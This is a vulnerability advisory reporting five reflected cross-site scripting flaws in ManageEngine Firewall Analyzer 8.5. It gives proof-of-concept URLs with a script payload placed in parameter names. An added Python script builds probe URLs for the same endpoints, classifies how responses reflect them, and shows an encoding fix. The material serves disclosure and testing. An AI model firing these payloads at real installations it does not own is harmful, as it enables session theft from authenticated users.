ManageEngine Firewall Analyzer 8.5 – Multiple Cross-Site Scripting Vulnerability

================================================================
ManageEngine Firewall Analyzer 8.5 – Multiple Cross-Site Scripting Vulnerabilities
================================================================

Information
---------------------------------------------------------------------------------------------------------------------------------

Vulnerability Type : Multiple Reflected Cross-Site Scripting Vulnerabilities
Vulnerable Version : 8.5
CVE-ID : 
Severity : High
Author : Sachin Wagh (@tiger_tigerboy)

Description 
---------------------------------------------------------------------------------------------------------------------------------
ManageEngine Firewall Analyzer is agentless log analytics and configuration management software that helps network administrators centrally collect,
archive and analyze their security device logs and generate forensic reports from them.

ManageEngine Firewall Analyzer 8.5 is prone to multiple reflected cross-site scripting vulnerabilities because it reflects user-supplied input into its pages without sanitizing or encoding it. In each of the proof-of-concept URLs below the payload is carried in the name of a query-string parameter, not its value, and it begins with `">` so that it closes the HTML attribute the name is reflected into before the script tag is emitted. An attacker who lures an authenticated user into opening a crafted link can execute arbitrary script code
in that user's browser in the context of the affected site, with access to the user's session.

Proof of Concept URL 
-----------------------------------------------------------------------------------------------------------------------------------

1. http://localhost:8500/ResolveDNSConfig.nms?f4efe"><script>alert(1)</script>2b1254aa403=1
2. http://localhost:8500/addDevCrd.nms?cba2d"><script>alert(1)</script>99328e18e3f=1
3. http://localhost:8500/customizeReportAction.nms?flushAll=true&17eab"><script>alert(1)</script>d1bf001d67b=1
4. http://localhost:8500/userIPConfig.nms?fe1b5"><script>alert(1)</script>62ff05628d3=1
5. http://localhost:8500/viewListPageAction.nms?3078c"><script>alert(1)</script>fea0d816dfe=1

Please find attached POC.
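The following Python script is an added example, not part of the original advisory, showing how to build probe URLs in the same shape as the five PoC URLs above and how to tell an exploitable reflection (the probe appears verbatim, with its bare `">`) from a fixed one (only an HTML-entity-encoded copy appears). The `ENDPOINTS` list is taken from the advisory; the sample page bodies are constructed here and are not captured from the product, and `reflect_safely` is this example's illustration of the fix, not a description of the vendor's patch.

```python
"""Probe builder and reflection classifier for the advisory's XSS pattern.

Added example, not code from the advisory or the vendor. The response
bodies below are constructed to illustrate the check and were not
captured from ManageEngine Firewall Analyzer.
"""
import html
import secrets

# Payload used in every PoC URL: closes the attribute, then injects a script tag.
PAYLOAD = '"><script>alert(1)</script>'

# Endpoints taken from the advisory's five PoC URLs (paths only).
ENDPOINTS = [
    "/ResolveDNSConfig.nms",
    "/addDevCrd.nms",
    "/customizeReportAction.nms?flushAll=true",
    "/userIPConfig.nms",
    "/viewListPageAction.nms",
]


def make_probe_param(payload: str = PAYLOAD) -> str:
    """Return a parameter *name* of the form <hex>payload<hex>, as in the PoCs.

    The random hex markers make the reflection unambiguous when grepping a
    response body for the probe.
    """
    return f"{secrets.token_hex(3)}{payload}{secrets.token_hex(3)}"


def build_poc_url(base: str, path: str, param: str) -> str:
    """Append the probe as a parameter name with the dummy value 1.

    Paths that already carry a query string (customizeReportAction.nms) get
    '&' instead of '?', matching PoC URL 3 in the advisory.
    """
    sep = "&" if "?" in path else "?"
    return f"{base}{path}{sep}{param}=1"


def classify_reflection(body: str, param: str) -> str:
    """Classify how a response body reflects the probe parameter name.

    'unescaped' -> the raw probe (bare '">' and '<script>') is present: exploitable
    'escaped'   -> only an entity-encoded copy is present: attribute context is safe
    'absent'    -> the name is not reflected at all
    """
    if param in body:
        return "unescaped"
    if html.escape(param, quote=True) in body:
        return "escaped"
    return "absent"


def reflect_safely(param_name: str) -> str:
    """Illustrative fix: entity-encode before the name lands in an attribute."""
    return html.escape(param_name, quote=True)


# Constructed sample responses (hypothetical; not the product's real markup).
def vulnerable_page(param: str) -> str:
    """Reflects the parameter name verbatim inside a quoted attribute."""
    return f'<input type="hidden" name="{param}" value="1">'


def fixed_page(param: str) -> str:
    """Same template with the name encoded for the attribute context."""
    return f'<input type="hidden" name="{reflect_safely(param)}" value="1">'


if __name__ == "__main__":
    probe = make_probe_param()
    for path in ENDPOINTS:
        print(build_poc_url("http://localhost:8500", path, probe))
    print("vulnerable:", classify_reflection(vulnerable_page(probe), probe))
    print("fixed:     ", classify_reflection(fixed_page(probe), probe))
```

When sending these URLs with a real HTTP client the quote and angle-bracket characters are percent-encoded on the wire and decoded server-side, so `classify_reflection` should be run against the decoded response body, and a result of `escaped` only proves the attribute context is safe; a reflection into a script block or an unquoted attribute would need a different check.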

Affected Product
-------------------------------------------------------------------------------------------------------------------------------------

                                [+]  ManageEngine Firewall Analyzer 8.5

Credits & Authors
-------------------------------------------------------------------------------------------------------------------------------------
Sachin Wagh (@tiger_tigerboy)


Thanks